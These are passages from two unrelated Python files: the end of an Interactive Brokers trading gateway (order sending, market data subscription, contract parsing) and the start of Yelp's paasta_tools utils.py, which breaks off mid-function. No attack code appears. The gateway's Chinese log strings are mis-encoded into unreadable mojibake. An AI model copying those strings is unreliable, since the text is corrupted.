self.client.reqCurrentTime()
def close(self):
"""
Disconnect to TWS.
"""
if not self.status:
return
self.status = False
self.client.disconnect()
def subscribe(self, req: SubscribeRequest):
"""
Subscribe tick data update.
"""
if not self.status:
return
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"ไธๆฏๆ็ไบคๆๆ{req.exchange}")
return
# Filter duplicate subscribe
if req.vt_symbol in self.subscribed:
return
self.subscribed.add(req.vt_symbol)
# Extract ib contract detail
ib_contract = generate_ib_contract(req.symbol, req.exchange)
if not ib_contract:
self.gateway.write_log("ไปฃ็ ่งฃๆๅคฑ่ดฅ๏ผ่ฏทๆฃๆฅๆ ผๅผๆฏๅฆๆญฃ็กฎ")
return
# Get contract data from TWS.
self.reqid += 1
self.client.reqContractDetails(self.reqid, ib_contract)
# Subscribe tick data and create tick object buffer.
self.reqid += 1
self.client.reqMktData(self.reqid, ib_contract, "", False, False, [])
tick = TickData(
symbol=req.symbol,
exchange=req.exchange,
datetime=datetime.now(self.local_tz),
gateway_name=self.gateway_name,
)
self.ticks[self.reqid] = tick
self.tick_exchange[self.reqid] = req.exchange
def send_order(self, req: OrderRequest):
"""
Send a new order.
"""
if not self.status:
return ""
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"ไธๆฏๆ็ไบคๆๆ๏ผ{req.exchange}")
return ""
if req.type not in ORDERTYPE_VT2IB:
self.gateway.write_log(f"ไธๆฏๆ็ไปทๆ ผ็ฑปๅ๏ผ{req.type}")
return ""
self.orderid += 1
ib_contract = generate_ib_contract(req.symbol, req.exchange)
if not ib_contract:
return ""
ib_order = Order()
ib_order.orderId = self.orderid
ib_order.clientId = self.clientid
ib_order.action = DIRECTION_VT2IB[req.direction]
ib_order.orderType = ORDERTYPE_VT2IB[req.type]
ib_order.totalQuantity = req.volume
ib_order.account = self.account
if req.type == OrderType.LIMIT:
ib_order.lmtPrice = req.price
elif req.type == OrderType.STOP:
ib_order.auxPrice = req.price
self.client.placeOrder(self.orderid, ib_contract, ib_order)
self.client.reqIds(1)
order = req.create_order_data(str(self.orderid), self.gateway_name)
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
"""
Cancel an existing order.
"""
if not self.status:
return
self.client.cancelOrder(int(req.orderid))
def query_history(self, req: HistoryRequest):
""""""
self.history_req = req
self.reqid += 1
ib_contract = generate_ib_contract(req.symbol, req.exchange)
if req.end:
end = req.end
end_str = end.strftime("%Y%m%d %H:%M:%S")
else:
end = datetime.now(self.local_tz)
end_str = ""
delta = end - req.start
days = min(delta.days, 180) # IB only provides 6-month data
duration = f"{days} D"
bar_size = INTERVAL_VT2IB[req.interval]
if req.exchange == Exchange.IDEALPRO:
bar_type = "MIDPOINT"
else:
bar_type = "TRADES"
self.client.reqHistoricalData(
self.reqid,
ib_contract,
end_str,
duration,
bar_size,
bar_type,
1,
1,
False,
[]
)
self.history_condition.acquire() # Wait for async data return
self.history_condition.wait()
self.history_condition.release()
history = self.history_buf
self.history_buf = [] # Create new buffer list
self.history_req = None
return history
def load_contract_data(self):
""""""
f = shelve.open(self.data_filepath)
self.contracts = f.get("contracts", {})
f.close()
for contract in self.contracts.values():
self.gateway.on_contract(contract)
self.gateway.write_log("ๆฌๅฐ็ผๅญๅ็บฆไฟกๆฏๅ ่ฝฝๆๅ")
def save_contract_data(self):
""""""
f = shelve.open(self.data_filepath)
f["contracts"] = self.contracts
f.close()
class IbClient(EClient):
""""""
def run(self):
"""
Reimplement the original run message loop of eclient.
Remove all unnecessary try...catch... and allow exceptions to interrupt loop.
"""
while not self.done and self.isConnected():
try:
text = self.msg_queue.get(block=True, timeout=0.2)
if len(text) > MAX_MSG_LEN:
errorMsg = "%s:%d:%s" % (BAD_LENGTH.msg(), len(text), text)
self.wrapper.error(
NO_VALID_ID, BAD_LENGTH.code(), errorMsg
)
self.disconnect()
break
fields = comm.read_fields(text)
self.decoder.interpret(fields)
except Empty:
pass
def generate_ib_contract(symbol: str, exchange: Exchange) -> Optional[Contract]:
""""""
try:
fields = symbol.split(JOIN_SYMBOL)
ib_contract = Contract()
ib_contract.exchange = EXCHANGE_VT2IB[exchange]
ib_contract.secType = fields[-1]
ib_contract.currency = fields[-2]
ib_contract.symbol = fields[0]
if ib_contract.secType in ["FUT", "OPT", "FOP"]:
ib_contract.lastTradeDateOrContractMonth = fields[1]
if ib_contract.secType == "FUT":
if len(fields) == 5:
ib_contract.multiplier = int(fields[2])
if ib_contract.secType in ["OPT", "FOP"]:
ib_contract.right = fields[2]
ib_contract.strike = float(fields[3])
ib_contract.multiplier = int(fields[4])
except IndexError:
ib_contract = None
return ib_contract
def generate_symbol(ib_contract: Contract) -> str:
""""""
fields = [ib_contract.symbol]
if ib_contract.secType in ["FUT", "OPT", "FOP"]:
fields.append(ib_contract.lastTradeDateOrContractMonth)
if ib_contract.secType in ["OPT", "FOP"]:
fields.append(ib_contract.right)
fields.append(str(ib_contract.strike))
fields.append(str(ib_contract.multiplier))
fields.append(ib_contract.currency)
fields.append(ib_contract.secType)
symbol = JOIN_SYMBOL.join(fields)
return symbol
|
utils.py
|
# Copyright 2015-2017 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import copy
import datetime
import difflib
import errno
import fcntl
import getpass
import glob
import hashlib
import io
import json
import logging
import math
import os
import pwd
import queue
import re
import shlex
import signal
import socket
import sys
import tempfile
import threading
import time
import warnings
from collections import OrderedDict
from enum import Enum
from fnmatch import fnmatch
from functools import lru_cache
from functools import wraps
from subprocess import PIPE
from subprocess import Popen
from subprocess import STDOUT
from types import FrameType
from typing import Any
from typing import Callable
from typing import cast
from typing import Collection
from typing import ContextManager
from typing import Dict
from typing import FrozenSet
from typing import IO
from typing import Iterable
from typing import Iterator
from typing import List
from typing import Mapping
from typing import Optional
from typing import Sequence
from typing import Set
from typing import Tuple
from typing import Type
from typing import TypeVar
from typing import Union
import choice
import dateutil.tz
import requests_cache
import service_configuration_lib
import yaml
from docker import Client
from docker.utils import kwargs_from_env
from kazoo.client import KazooClient
from mypy_extensions import TypedDict
from service_configuration_lib import read_service_configuration
import paasta_tools.cli.fsm
# DO NOT CHANGE SPACER, UNLESS YOU'RE PREPARED TO CHANGE ALL INSTANCES
# OF IT IN OTHER LIBRARIES (i.e. service_configuration_lib).
# It's used to compose a job's full ID from its name and instance
SPACER = "."
INFRA_ZK_PATH = "/nail/etc/zookeeper_discovery/infrastructure/"
PATH_TO_SYSTEM_PAASTA_CONFIG_DIR = os.environ.get(
"PAASTA_SYSTEM_CONFIG_DIR", "/etc/paasta/"
)
DEFAULT_SOA_DIR = service_configuration_lib.DEFAULT_SOA_DIR
DEFAULT_DOCKERCFG_LOCATION = "file:///root/.dockercfg"
DEPLOY_PIPELINE_NON_DEPLOY_STEPS = (
"itest",
"itest-and-push-to-registry",
"security-check",
"performance-check",
"push-to-registry",
)
# Default values for _log
ANY_CLUSTER = "N/A"
ANY_INSTANCE = "N/A"
DEFAULT_LOGLEVEL = "event"
no_escape = re.compile(r"\x1B\[[0-9;]*[mK]")
# instead of the convention of using underscores in this scribe channel name,
# the audit log uses dashes to prevent collisions with a service that might be
# named 'audit_log'
AUDIT_LOG_STREAM = "stream_paasta-audit-log"
DEFAULT_SYNAPSE_HAPROXY_URL_FORMAT = (
"http://{host:s}:{port:d}/;csv;norefresh;scope={scope:s}"
)
DEFAULT_CPU_PERIOD = 100000
DEFAULT_CPU_BURST_ADD = 1
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
INSTANCE_TYPES = (
"marathon",
"paasta_native",
"adhoc",
"kubernetes",
"tron",
"flink",
"cassandracluster",
"kafkacluster",
)
INSTANCE_TYPES_K8S = {"flink", "cassandracluster", "kafkacluster"}
INSTANCE_TYPES_WITH_SET_STATE = {"flink"}
class RollbackTypes(Enum):
AUTOMATIC_SLO_ROLLBACK = "automatic_slo_rollback"
USER_INITIATED_ROLLBACK = "user_initiated_rollback"
class TimeCacheEntry(TypedDict):
data: Any
fetch_time: float
_CacheRetT = TypeVar("_CacheRetT")
class time_cache:
def __init__(self, ttl: float = 0) -> None:
self.configs: Dict[Tuple, TimeCacheEntry] = {}
self.ttl = ttl
def __call__(self, f: Callable[..., _CacheRetT]) -> Callable[..., _CacheRetT]:
def cache(*args: Any, **kwargs: Any) -> _CacheRetT:
if "ttl" in kwargs:
ttl = kwargs["ttl"]
del kwargs["ttl"]
else:
ttl = self.ttl
key = args
for item in kwargs.items():
key += item
if (
(not ttl)
or (key not in self.configs)
or (time.time() - self.configs[key]["fetch_time"] > ttl)
):
self.configs[key] = {
"data": f(*args, **kwargs),
"fetch_time": time.time(),
}
return self.configs[key]["data"]
return cache
_SortDictsT = TypeVar("_SortDictsT", bound=Mapping)
def sort_dicts(dcts: Iterable[_SortDictsT]) -> List[_SortDictsT]:
def key(dct: _SortDictsT) -> Tuple:
return tuple(sorted(dct.items()))
return sorted(dcts, key=key)
class InvalidInstanceConfig(Exception):
pass
DeployBlacklist = List[Tuple[str, str]]
DeployWhitelist = Optional[Tuple[str, List[str]]]
# The actual config files will have lists, since tuples are not expressible in base YAML, so we define different types
# here to represent that. The getter functions will convert to the safe versions above.
UnsafeDeployBlacklist = Optional[Sequence[Sequence[str]]]
UnsafeDeployWhitelist = Optional[Sequence[Union[str, Sequence[str]]]]
Constraint = Sequence[str]
# e.g. ['GROUP_BY', 'habitat', 2]. Marathon doesn't like that so we'll convert to Constraint later.
UnstringifiedConstraint = Sequence[Union[str, int, float]]
SecurityConfigDict = Dict # Todo: define me.
class VolumeWithMode(TypedDict):
mode: str
class DockerVolume(VolumeWithMode):
hostPath: str
containerPath: str
class AwsEbsVolume(VolumeWithMode):
volume_id: str
fs_type: str
partition: int
container_path: str
class PersistentVolume(VolumeWithMode):
size: int
container_path: str
storage_class_name: str
class InstanceConfigDict(TypedDict, total=False):
deploy_group: str
mem: float
cpus: float
disk: float
cmd: str
args: List[str]
cfs_period_us: float
cpu_burst_add: float
cap_add: List
env: Dict[str, str]
monitoring: Dict[str, str]
deploy_blacklist: UnsafeDeployBlacklist
deploy_whitelist: UnsafeDeployWhitelist
pool: str
persistent_volumes: List[PersistentVolume]
role: str
extra_volumes: List[DockerVolume]
aws_ebs_volumes: List[AwsEbsVolume]
security: SecurityConfigDict
dependencies_reference: str
dependencies: Dict[str, Dict]
constraints: List[UnstringifiedConstraint]
extra_constraints: List[UnstringifiedConstraint]
net: str
extra_docker_args: Dict[str, str]
gpus: int
branch: str
class BranchDictV1(TypedDict, total=False):
docker_image: str
desired_state: str
force_bounce: Optional[str]
class BranchDictV2(TypedDict):
git_sha: str
docker_image: str
desired_state: str
force_bounce: Optional[str]
class DockerParameter(TypedDict):
key: str
value: str
def safe_deploy_blacklist(input: UnsafeDeployBlacklist) -> DeployBlacklist:
return [(t, l) for t, l in input]
def safe_deploy_whitelist(input: UnsafeDeployWhitelist) -> DeployWhitelist:
try:
location_type, allowed_values = input
return cast(str, location_type), cast(List[str], allowed_values)
except TypeError:
return None
# For mypy typing
InstanceConfig_T = TypeVar("InstanceConfig_T", bound="InstanceConfig")
class InstanceConfig:
config_filename_prefix: str
def __init__(
self,
cluster: str,
instance: str,
service: str,
config_dict: InstanceConfigDict,
branch_dict: Optional[BranchDictV2],
soa_dir: str = DEFAULT_SOA_DIR,
) -> None:
self.config_dict = config_dict
self.branch_dict = branch_dict
self.cluster = cluster
self.instance = instance
self.service = service
self.soa_dir = soa_dir
self._job_id = compose_job_id(service, instance)
config_interpolation_keys = ("deploy_group",)
interpolation_facts = self.__get_interpolation_facts()
for key in config_interpolation_keys:
if (
key in self.config_dict
and self.config_dict[key] is not None # type: ignore
):
self.config_dict[key] = self.config_dict[key].format( # type: ignore
**interpolation_facts
)
def __repr__(self) -> str:
return "{!s}({!r}, {!r}, {!r}, {!r}, {!r}, {!r})".format(
self.__class__.__name__,
self.service,
self.instance,
self.cluster,
self.config_dict,
self.branch_dict,
self.soa_dir,
)
def __get_interpolation_facts(self) -> Dict[str, str]:
return {
"cluster": self.cluster,
"instance": self.instance,
"service": self.service,
}
def get_cluster(self) -> str:
return self.cluster
def get_instance(self) -> str:
return self.instance
def get_service(self) -> str:
return self.service
@property
def job_id(self) -> str:
return self._job_id
def get_docker_registry(self) -> str:
return get_service_docker_registry(self.service, self.soa_dir)
def get_branch(self) -> str:
return get_paasta_branch(
cluster=self.get_cluster(), instance=self.get_instance()
)
def get_deploy_group(self) -> str:
return self.config_dict.get("deploy_group", self.get_branch())
def get_team(self) -> str:
return self.config_dict.get("monitoring", {}).get("team", None)
def get_mem(self) -> float:
"""Gets the memory required from the service's configuration.
Defaults to 1024 (1G) if no value specified in the config.
:returns: The amount of memory specified by the config, 1024 if not specified"""
mem = self.config_dict.get("mem", 1024)
return mem
def get_mem_swap(self) -> str:
"""Gets the memory-swap value. This value is passed to the docker
container to ensure that the total memory limit (memory + swap) is the
same value as the 'mem' key in soa-configs. Note - this value *has* to
be >= to the mem key, so we always round up to the closest MB and add
additional 64MB for the docker executor (See PAASTA-12450).
"""
mem = self.get_mem()
mem_swap = int(math.ceil(mem + 64))
return "%sm" % mem_swap
def get_cpus(self) -> float:
"""Gets the number of cpus required from the service's configuration.
Defaults to .25 (1/4 of a cpu) if no value specified in the config.
:returns: The number of cpus specified in the config, .25 if not specified"""
cpus = self.config_dict.get("cpus", 0.25)
return cpus
def get_cpu_burst_add(self) -> float:
"""Returns the number of additional cpus a container is allowed to use.
Defaults to DEFAULT_CPU_BURST_ADD"""
return self.config_dict.get("cpu_burst_add", DEFAULT_CPU_BURST_ADD)
def get_cpu_period(self) -> float:
"""The --cpu-period option to be passed to docker
Comes from the cfs_period_us configuration option
:returns: The number to be passed to the --cpu-period docker flag"""
return self.config_dict.get("cfs_period_us", DEFAULT_CPU_PERIOD)
def get_cpu_quota(self) -> float:
"""Gets the --cpu-quota option to be passed to docker
Calculation: (cpus + cpus_burst_add) * cfs_period_us
:returns: The number to be passed to the --cpu-quota docker flag"""
cpu_burst_add = self.get_cpu_burst_add()
return (self.get_cpus() + cpu_burst_add) * self.get_cpu_period()
def get_extra_docker_args(self) -> Dict[str, str]:
return self.config_dict.get("extra_docker_args", {})
def get_cap_add(self) -> Iterable[DockerParameter]:
"""Get the --cap-add options to be passed to docker
Generated from the cap_add configuration option, which is a list of
capabilities.
Example configuration: {'cap_add': ['IPC_LOCK', 'SYS_PTRACE']}
:returns: A generator of cap_add options to be passed as --cap-add flags"""
for value in self.config_dict.get("cap_add", []):
yield {"key": "cap-add", "value": f"{value}"}
def get_cap_drop(self) -> Iterable[DockerParameter]:
"""Generates --cap-drop options to be passed to docker by default, which
makes them not able to perform special privilege escalation stuff
https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities
"""
caps = [
"SETPCAP",
"MKNOD",
"AUDIT_WRITE",
"CHOWN",
"NET_RAW",
"DAC_OVERRIDE",
"FOWNER",
"FSETID",
"KILL",
"SETGID",
"SETUID",
"NET_BIND_SERVICE",
"SYS_CHROOT",
"SETFCAP",
]
for cap in caps:
yield {"key": "cap-drop", "value": cap}
def format_docker_parameters(
self, with_labels: bool = True
) -> List[DockerParameter]:
"""Formats extra flags for running docker. Will be added in the format
`["--%s=%s" % (e['key'], e['value']) for e in list]` to the `docker run` command
Note: values must be strings
:param with_labels: Whether to build docker parameters with or without labels
:returns: A list of parameters to be added to docker run"""
parameters: List[DockerParameter] = [
{"key": "memory-swap", "value": self.get_mem_swap()},
{"key": "cpu-period", "value": "%s" % int(self.get_cpu_period())},
{"key": "cpu-quota", "value": "%s" % int(self.get_cpu_quota())},
]
if self.use_docker_disk_quota():
parameters.append(
{
"key": "storage-opt",
"value": f"size={int(self.get_disk() * 1024 * 1024)}",
}
)
if with_labels:
parameters.extend(
[
{"key": "label", "value": "paasta_service=%s" % self.service},
{"key": "label", "value": "paasta_instance=%s" % self.instance},
]
)
extra_docker_args = self.get_extra_docker_args()
if extra_docker_args:
for key, value in extra_docker_args.items():
parameters.extend([{"key": key, "value": value}])
parameters.extend(self.get_cap_add())
parameters.extend(self.get_docker_init())
parameters.extend(self.get_cap_drop())
return parameters
def use_docker_disk_quota(self) -> bool:
return load_system_paasta_config().get_enforce_disk_quota()
def get_docker_init(self) -> Iterable[DockerParameter]:
return [{"key": "init", "value": "true"}]
def get_disk(self, default: float = 1024) -> float:
"""Gets the amount of disk space in MiB required from the service's configuration.
Defaults to 1024 (1GiB) if no value is specified in the config.
:returns: The amount of disk space specified by the config, 1024 MiB if not specified"""
disk = self.config_dict.get("disk", default)
return disk
def get_gpus(self) -> Optional[int]:
"""Gets the number of gpus required from the service's configuration.
Default to None if no value is specified in the config.
:returns: The number of gpus specified by the config, 0 if not specified"""
gpus = self.config_dict.get("gpus", None)
return gpus
def get_container_type(self) -> Optional[str]:
"""Get Mesos containerizer type.
Default to DOCKER if gpus are not used.
:returns: Mesos containerizer type, DOCKER or MESOS"""
if self.get_gpus() is not None:
container_type = "MESOS"
else:
container_type = "DOCKER"
return container_type
def get_cmd(self) -> Optional[Union[str, List[str]]]:
"""Get the docker cmd specified in the service's configuration.
Defaults to None if not specified in the config.
:returns: A string specified in the config, None if not specified"""
return self.config_dict.get("cmd", None)
def get_instance_type(self) -> Optional[str]:
return getattr(self, "config_filename_prefix", None)
def get_env_dictionary(self) -> Dict[str, str]:
"""A dictionary of key/value pairs that represent environment variables
to be injected to the container environment"""
env = {
"PAASTA_SERVICE": self.service,
"PAASTA_INSTANCE": self.instance,
"PAASTA_CLUSTER": self.cluster,
"PAASTA_DEPLOY_GROUP": self.get_deploy_group(),
"PAASTA_DOCKER_IMAGE": self.get_docker_image(),
"PAASTA_RESOURCE_CPUS": str(self.get_cpus()),
"PAASTA_RESOURCE_MEM": str(self.get_mem()),
"PAASTA_RESOURCE_DISK": str(self.get_disk()),
}
if self.get_gpus() is not None:
env["PAASTA_RESOURCE_GPUS"] = str(self.get_gpus())
try:
env["PAASTA_GIT_SHA"] = get_git_sha_from_dockerurl(self.get_docker_url())
except Exception:
pass
team = self.get_team()
if team:
env["PAASTA_MONITORING_TEAM"] = team
instance_type = self.get_instance_type()
if instance_type:
env["PAASTA_INSTANCE_TYPE"] = instance_type
user_env = self.config_dict.get("env", {})
env.update(user_env)
return {str(k): str(v) for (k, v) in env.items()}
def get_env(self) -> Dict[str, str]:
"""Basic get_env that simply returns the basic env, other classes
might need to override this getter for more implementation-specific
env getting"""
return self.get_env_dictionary()
def get_args(self) -> Optional[List[str]]:
"""Get the docker args specified in the service's configuration.
If not specified in the config and if cmd is not specified, defaults to an empty array.
If not specified in the config but cmd is specified, defaults to null.
If specified in the config and if cmd is also specified, throws an exception. Only one may be specified.
:param service_config: The service instance's configuration dictionary
:returns: An array of args specified in the config,
``[]`` if not specified and if cmd is not specified,
otherwise None if not specified but cmd is specified"""
if self.get_cmd() is None:
return self.config_dict.get("args", [])
else:
args = self.config_dict.get("args", None)
if args is None:
return args
else:
# TODO validation stuff like this should be moved into a check_*
raise InvalidInstanceConfig(
"Instance configuration can specify cmd or args, but not both."
)
def get_monitoring(self) -> Dict[str, Any]:
"""Get monitoring overrides defined for the given instance"""
return self.config_dict.get("monitoring", {})
def get_deploy_constraints(
self,
blacklist: DeployBlacklist,
whitelist: DeployWhitelist,
system_deploy_blacklist: DeployBlacklist,
system_deploy_whitelist: DeployWhitelist,
) -> List[Constraint]:
"""Return the combination of deploy_blacklist and deploy_whitelist
as a list of constraints.
"""
return (
deploy_blacklist_to_constraints(blacklist)
+ deploy_whitelist_to_constraints(whitelist)
+ deploy_blacklist_to_constraints(system_deploy_blacklist)
+ deploy_whitelist_to_constraints(system_deploy_whitelist)
)
def get_deploy_blacklist(self) -> DeployBlacklist:
"""The deploy blacklist is a list of lists, where the lists indicate
which locations the service should not be deployed"""
return safe_deploy_blacklist(self.config_dict.get("deploy_blacklist", []))
def get_deploy_whitelist(self) -> DeployWhitelist:
"""The deploy whitelist is a tuple of (location_type, [allowed value, allowed value, ...]).
To have tasks scheduled on it, a host must be covered by the deploy whitelist (if present) and not excluded by
the deploy blacklist."""
return safe_deploy_whitelist(self.config_dict.get("deploy_whitelist"))
def get_docker_image(self) -> str:
"""Get the docker image name (with tag) for a given service branch from
a generated deployments.json file."""
if self.branch_dict is not None:
return self.branch_dict["docker_image"]
else:
return ""
def get_docker_url(self) -> str:
"""Compose the docker url.
:returns: '<registry_uri>/<docker_image>'
"""
registry_uri = self.get_docker_registry()
docker_image = self.get_docker_image()
if not docker_image:
raise NoDockerImageError(
"Docker url not available because there is no docker_image"
)
docker_url = f"{registry_uri}/{docker_image}"
return docker_url
def get_desired_state(self) -> str:
"""Get the desired state (either 'start' or 'stop') for a given service
branch from a generated deployments.json file."""
if self.branch_dict is not None:
return self.branch_dict["desired_state"]
else:
return "start"
def get_force_bounce(self) -> Optional[str]:
"""Get the force_bounce token for a given service branch from a generated
deployments.json file. This is a token that, when changed, indicates that
the instance should be recreated and bounced, even if no other
parameters have changed. This may be None or a string, generally a
timestamp.
"""
if self.branch_dict is not None:
return self.branch_dict["force_bounce"]
else:
return None
def check_cpus(self) -> Tuple[bool, str]:
cpus = self.get_cpus()
if cpus is not None:
if not isinstance(cpus, (float, int)):
return (
False,
'The specified cpus value "%s" is not a valid float or int.' % cpus,
)
return True, ""
def check_mem(self) -> Tuple[bool, str]:
mem = self.get_mem()
if mem is not None:
if not isinstance(mem, (float, int)):
return (
False,
'The specified mem value "%s" is not a valid float or int.' % mem,
)
return True, ""
def check_disk(self) -> Tuple[bool, str]:
disk = self.get_disk()
if disk is not None:
if not isinstance(disk, (float, int)):
return (
False,
'The specified disk value "%s" is not a valid float or int.' % disk,
)
return True, ""
def check_security(self) -> Tuple[bool, str]:
security = self.config_dict.get("security")
if security is None:
return True, ""
outbound_firewall = security.get("outbound_firewall")
if outbound_firewall is None:
return True, ""
if outbound_firewall not in ("block", "monitor"):
return (
False,
'Unrecognized outbound_firewall value "%s"' % outbound_firewall,
)
unknown_keys = set(security.keys()) - {"outbound_firewall"}
if unknown_keys:
return (
False,
'Unrecognized items in security dict of service config: "%s"'
% ",".join(unknown_keys),
)
return True, ""
def check_dependencies_reference(self) -> Tuple[bool, str]:
dependencies_reference = self.config_dict.get("dependencies_reference")
if dependencies_reference is None:
return True, ""
dependencies = self.config_dict.get("dependencies")
if dependencies is None:
return (
False,
'dependencies_reference "%s" declared but no dependencies found'
% dependencies_reference,
)
if dependencies_reference not in dependencies:
return (
False,
'dependencies_reference "%s" not found in dependencies dictionary'
% dependencies_reference,
)
return True, ""
def check(self, param: str) -> Tuple[bool, str]:
check_methods = {
"cpus": self.check_cpus,
"mem": self.check_mem,
"security": self.check_security,
"dependencies_reference": self.check_dependencies_reference,
"deploy_group": self.check_deploy_group,
}
check_method = check_methods.get(param)
if check_method is not None:
return check_method()
else:
return (
False,
'Your service config specifies "%s", an unsupported parameter.' % param,
)
def validate(
self,
params: List[str] = [
"cpus",
"mem",
"security",
"dependencies_reference",
"deploy_group",
],
) -> List[str]:
error_msgs = []
for param in params:
check_passed, check_msg = self.check(param)
if not check_passed:
error_msgs.append(check_msg)
return error_msgs
def check_deploy_group(self) -> Tuple[bool, str]:
deploy_group = self.get_deploy_group()
if deploy_group is not None:
pipeline_deploy_groups = get_pipeline_deploy_groups(
service=self.service, soa_dir=self.soa_dir
)
if deploy_group not in pipeline_deploy_groups:
return (
False,
f"{self.service}.{self.instance} uses deploy_group {deploy_group}, but it is not deploy.yaml",
) # noqa: E501
return True, ""
def get_extra_volumes(self) -> List[DockerVolume]:
"""Extra volumes are a specially formatted list of dictionaries that should
be bind mounted in a container The format of the dictionaries should
conform to the `Mesos container volumes spec
<https://mesosphere.github.io/marathon/docs/native-docker.html>`_"""
return self.config_dict.get("extra_volumes", [])
def get_aws_ebs_volumes(self) -> List[AwsEbsVolume]:
return self.config_dict.get("aws_ebs_volumes", [])
def get_role(self) -> Optional[str]:
"""Which mesos role of nodes this job should run on.
"""
return self.config_dict.get("role")
def get_pool(self) -> str:
"""Which pool of nodes this job should run on. This can be used to mitigate noisy neighbors, by putting
particularly noisy or noise-sensitive jobs into different pools.
This is implemented with an attribute "pool" on each mesos slave and by adding a constraint to Marathon/Chronos
application defined by this instance config.
Eventually this may be implemented with Mesos roles, once a framework can register under multiple roles.
:returns: the "pool" attribute in your config dict, or the string "default" if not specified."""
return self.config_dict.get("pool", "default")
def get_pool_constraints(self) -> List[Constraint]:
pool = self.get_pool()
return [["pool", "LIKE", pool]]
def get_constraints(self) -> Optional[List[Constraint]]:
return stringify_constraints(self.config_dict.get("constraints", None))
def get_extra_constraints(self) -> List[Constraint]:
return stringify_constraints(self.config_dict.get("extra_constraints", []))
def get_net(self) -> str:
"""
:returns: the docker networking mode the container should be started with.
"""
return self.config_dict.get("net", "bridge")
def get_volumes(self, system_volumes: Sequence[DockerVolume]) -> List[DockerVolume]:
volumes = list(system_volumes) + list(self.get_extra_volumes())
deduped = {
v["containerPath"].rstrip("/") + v["hostPath"].rstrip("/"): v
for v in volumes
}.values()
return sort_dicts(deduped)
def get_persistent_volumes(self) -> Sequence[PersistentVolume]:
return self.config_dict.get("persistent_volumes", [])
def get_dependencies_reference(self) -> Optional[str]:
"""Get the reference to an entry in dependencies.yaml
Defaults to None if not specified in the config.
:returns: A string specified in the config, None if not specified"""
return self.config_dict.get("dependencies_reference")
def get_dependencies(self) -> Optional[Dict]:
"""Get the contents of the dependencies_dict pointed to by the dependency_reference or
'main' if no dependency_reference exists
Defaults to None if not specified in the config.
:returns: A list of dictionaries specified in the dependencies_dict, None if not specified"""
dependencies = self.config_dict.get("dependencies")
if not dependencies:
return None
dependency_ref = self.get_dependencies_reference() or "main"
return dependencies.get(dependency_ref)
def get_outbound_firewall(self) -> Optional[str]:
"""Return 'block', 'monitor', or None as configured in security->outbound_firewall
Defaults to None if not specified in the config
:returns: A string specified in the config, None if not specified"""
security = self.config_dict.get("security")
if not security:
return None
return security.get("outbound_firewall")
def __eq__(self, other: Any) -> bool:
if isinstance(other, type(self)):
return (
self.config_dict == other.config_dict
and self.branch_dict == other.branch_dict
and self.cluster == other.cluster
and self.instance == other.instance
and self.service == other.service
)
else:
return False
def stringify_constraint(usc: UnstringifiedConstraint) -> Constraint:
return [str(x) for x in usc]
def stringify_constraints(
uscs: Optional[List[UnstringifiedConstraint]],
) -> List[Constraint]:
if uscs is None:
return None
return [stringify_constraint(usc) for usc in uscs]
@time_cache(ttl=60)
def validate_service_instance(
service: str, instance: str, cluster: str, soa_dir: str
) -> str:
possibilities: List[str] = []
for instance_type in INSTANCE_TYPES:
sis = get_service_instance_list(
service=service,
cluster=cluster,
instance_type=instance_type,
soa_dir=soa_dir,
)
if (service, instance) in sis:
return instance_type
possibilities.extend(si[1] for si in sis)
else:
suggestions = suggest_possibilities(word=instance, possibilities=possibilities)
raise NoConfigurationForServiceError(
f"Error: {compose_job_id(service, instance)} doesn't look like it has been configured "
f"to run on the {cluster} cluster.{suggestions}"
)
_ComposeRetT = TypeVar("_ComposeRetT")
_ComposeInnerRetT = TypeVar("_ComposeInnerRetT")
def compose(
func_one: Callable[[_ComposeInnerRetT], _ComposeRetT],
func_two: Callable[..., _ComposeInnerRetT],
) -> Callable[..., _ComposeRetT]:
def composed(*args: Any, **kwargs: Any) -> _ComposeRetT:
return func_one(func_two(*args, **kwargs))
return composed
class PaastaColors:
"""Collection of static variables and methods to assist in coloring text."""
# ANSI color codes
BLUE = "\033[34m"
BOLD = "\033[1m"
CYAN = "\033[36m"
DEFAULT = "\033[0m"
GREEN = "\033[32m"
GREY = "\033[38;5;242m"
MAGENTA = "\033[35m"
RED = "\033[31m"
YELLOW = "\033[33m"
@staticmethod
def bold(text: str) -> str:
"""Return bolded text.
:param text: a string
:return: text color coded with ANSI bold
"""
return PaastaColors.color_text(PaastaColors.BOLD, text)
@staticmethod
def blue(text: str) -> str:
"""Return text that can be printed blue.
:param text: a string
:return: text color coded with ANSI blue
"""
return PaastaColors.color_text(PaastaColors.BLUE, text)
@staticmethod
def green(text: str) -> str:
"""Return text that can be printed green.
:param text: a string
:return: text color coded with ANSI green"""
return PaastaColors.color_text(PaastaColors.GREEN, text)
@staticmethod
def red(text: str) -> str:
"""Return text that can be printed red.
:param text: a string
:return: text color coded with ANSI red"""
return PaastaColors.color_text(PaastaColors.RED, text)
@staticmethod
def magenta(text: str) -> str:
"""Return text that can be printed magenta.
:param text: a string
:return: text color coded with ANSI magenta"""
return PaastaColors.color_text(PaastaColors.MAGENTA, text)
@staticmethod
def color_text(color: str, text: str) -> str:
"""Return text that can be printed color.
:param color: ANSI color code
:param text: a string
:return: a string with ANSI color encoding"""
# any time text returns to default, we want to insert our color.
replaced = text.replace(PaastaColors.DEFAULT, PaastaColors.DEFAULT + color)
# then wrap the beginning and end in our color/default.
return color + replaced + PaastaColors.DEFAULT
@staticmethod
def cyan(text: str) -> str:
"""Return text that can be printed cyan.
:param text: a string
:return: text color coded with ANSI cyan"""
return PaastaColors.color_text(PaastaColors.CYAN, text)
@staticmethod
def yellow(text: str) -> str:
"""Return text that can be printed yellow.
:param text: a string
:return: text color coded with ANSI yellow"""
return PaastaColors.color_text(PaastaColors.YELLOW, text)
@staticmethod
def grey(text: str) -> str:
return PaastaColors.color_text(PaastaColors.GREY, text)
@staticmethod
def default(text: str) -> str:
